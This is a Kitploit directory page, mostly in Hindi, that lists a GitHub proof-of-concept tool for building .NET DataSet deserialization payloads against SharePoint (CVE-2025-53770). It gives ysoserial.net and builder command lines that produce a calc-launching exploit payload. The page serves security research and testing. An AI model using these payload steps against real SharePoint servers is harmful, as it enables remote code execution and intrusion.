Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
SharePoint-CVE-2025-53770-POC — एक C# टूल जो LosFormatter का उपयोग करके GZipped, Base64-encoded .NET DataSet पेलोड तैयार करता है, ताकि SharePoint deserialization RCE श्रृंखला (CVE-2025-53770) को पुनरुत्पन्न किया जा सके। | Kitploit
उपकरण/GitHubGitHub/immersive-labs-sec/sharepoint-cve-2025-53770-poc
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubimmersive-labs-sec/sharepoint-cve-2025-53770-poc

SharePoint-CVE-2025-53770-POC

एक C# टूल जो LosFormatter का उपयोग करके GZipped, Base64-encoded .NET DataSet पेलोड तैयार करता है, ताकि SharePoint deserialization RCE श्रृंखला (CVE-2025-53770) को पुनरुत्पन्न किया जा सके।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
431 साल पहलेअभी तक समीक्षित नहीं
साझा करें

OurSharePoint - CVE-2025-53770 (PoC)

यह एक सरल C# टूल है जो LosFormatter-एन्कोडेड आंतरिक पेलोड का उपयोग करके GZipped, Base64-एन्कोडेड .NET DataSet पेलोड बनाता है। इसे सार्वजनिक शोध में वर्णित SharePoint डिसीरियलाइज़ेशन RCE श्रृंखला को दोहराने में मदद करने के लिए डिज़ाइन किया गया है।


यह क्या करता है

आप इसे एक Base64-एन्कोडेड पेलोड देते हैं (जैसे ysoserial.net से), और यह:

  • इसे एक कस्टम XML स्कीमा + diffgram के साथ वैध .NET DataSet के अंदर लपेटता है
  • BinaryFormatter का उपयोग करके परिणाम को सीरियलाइज़ करता है
  • सीरियलाइज़्ड ब्लॉब को GZip करता है
  • परिणाम को Base64-एन्कोड करता है और उसे .b64 फ़ाइल में लिखता है

संदर्भ

  • https://research.eye.security/sharepoint-under-siege/
  • https://github.com/rapid7/metasploit-framework/pull/20409/commits

उपयोग

पहले, ysoserial.net का उपयोग करके अपना पेलोड जनरेट करें:

root@kitploit:~
ysoserial.exe -f LosFormatter -g TypeConfuseDelegate -o base64 -c "cmd /c calc.exe" > nested_gadget.b64

फिर इस टूल को चलाएँ:

root@kitploit:~
OurSharePointBuilder.exe --in=nested_gadget.b64 --out=exploit --a=<random> --b=<random> --c=<random>

यह जनरेट करेगा:

  • exploit.bin - एक रॉ सीरियलाइज़्ड DataSet
  • exploit.b64 - अंतिम GZipped और Base64-एन्कोडेड पेलोड जो हमारे लिए तैयार है

इसके अलावा, यदि आप --a, --b, या --c निर्दिष्ट नहीं करते हैं, तो टूल यादृच्छिक लोअरकेस नाम जनरेट करता है।

नोट्स

root@kitploit:~
This tool does not validate or inspect the payload you give it.

If you're testing locally and deserialize manually, it may execute (e.g., pop calc).
टूल डाउनलोड करें